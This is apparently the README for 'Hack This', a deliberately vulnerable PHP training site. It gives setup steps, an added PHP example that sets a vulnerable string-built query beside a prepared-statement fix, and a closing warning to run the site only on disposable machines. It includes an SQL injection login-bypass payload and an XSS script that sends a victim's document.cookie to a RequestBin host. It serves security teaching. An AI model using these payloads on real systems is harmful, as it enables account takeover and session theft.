Hack This

A collection of common web programming mistakes.

This website, when set up and configured, contains a number of vulnerabilities that can be exploited, including:

Prerequisites

You'll need to have a web server installed and configured with PHP for this to work. I really recommend XAMPP, especially for Windows users. Once you've done that you can proceed.

You'll also need Node.js and npm installed and working.

Building

Clone the project down and open the folder in your favourite editor. It's a JetBrains PhpStorm project but you can use whichever paid/free software takes your fancy.

First, install the npm packages necessary to build and run the website. Run the following in your terminal in the project root directory:

npm install

This will install Bower, which will allow you to install the assets the website requires (Bootstrap, jQuery etc.) using the command:

bower install

Gulp will also have been installed. This will compile the Less and CoffeeScript into CSS and JS ready for production. Do this using the command:

gulp

This command needs to be run again every time you change a Less file. If you're working on them, run gulp watch in a terminal to watch for file changes and compile accordingly.

Setup

To set everything up, you'll need to:

Examples

Examples of vulnerabilities in this web application include:

SQL Injection

In an SQL injection attack, malicious SQL statements are inserted into an entry field for execution (usually in a data-driven web application).

Bypass Login (SQL Injection)

It's possible to bypass login completely (logging in as whoever you like) by adding an always-true condition to the password check:

foo' or '1'='1
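To show why the payload above works and what the fix looks like, here is an added example (not code from the Hack This project): a string-built login query beside a prepared-statement version. It assumes a hypothetical users table and uses an in-memory SQLite database via PDO (requires the pdo_sqlite extension) for a quick self-check.

```php
<?php
// Added example, not part of the Hack This project. The `users` table and
// column names below are hypothetical.

// VULNERABLE: user input is spliced straight into the SQL text.
function buildLoginSqlVulnerable(string $user, string $pass): string
{
    return "SELECT * FROM users WHERE username = '$user' AND password = '$pass'";
}

// With the payload from the README as the password, the WHERE clause becomes
//   username = 'admin' AND password = 'foo' or '1'='1'
// AND binds tighter than OR, so the clause is true for every row and the
// password check no longer constrains anything.
echo buildLoginSqlVulnerable('admin', "foo' or '1'='1"), PHP_EOL;

// HARDENED: the SQL text is fixed at prepare time; the value travels as a
// bound parameter and cannot change the statement's structure. The password
// is checked against a stored hash instead of a plaintext column.
function findUserSafe(PDO $pdo, string $user, string $pass): ?array
{
    $stmt = $pdo->prepare(
        'SELECT id, username, password_hash FROM users WHERE username = :user'
    );
    $stmt->execute([':user' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row !== false && password_verify($pass, $row['password_hash'])) {
        unset($row['password_hash']);
        return $row;
    }
    return null;
}

// Self-check with a constructed in-memory database: the injection payload is
// treated as a literal (wrong) password, while the real password still works.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)');
$ins = $pdo->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
$ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

var_dump(findUserSafe($pdo, 'alice', "foo' or '1'='1") === null);
var_dump(findUserSafe($pdo, 'alice', 'correct horse')['username'] === 'alice');
```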

Session Hijacking (XSS)

Using a service like RequestBin, it's possible to hijack user sessions by capturing their session cookie. Try sending a message to a user consisting of the following code (with {{ bin_id }} replaced by your RequestBin bin ID).

<script>
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open("GET", "http://requestbin.fullcontact.com/{{ bin_id }}?c=" + document.cookie, false);
    xmlHttp.send(null);
</script>

Warnings

This site is intentionally left vulnerable to common exploits. Don't host it on the same server as any production sites; only ever deploy it on a machine that you wouldn't mind bricking (I recommend a disposable VM).

Acknowledgements

This is heavily based on the php-sploits repository by Jared Mooring and Allan Shone. Find the slides for their SydPHP talk here.

The homepage template is a highly modified version of the Blackrock Digital Freelancer template, a wonderful, free, MIT-licensed template. Check it out if you're in the market for such a thing.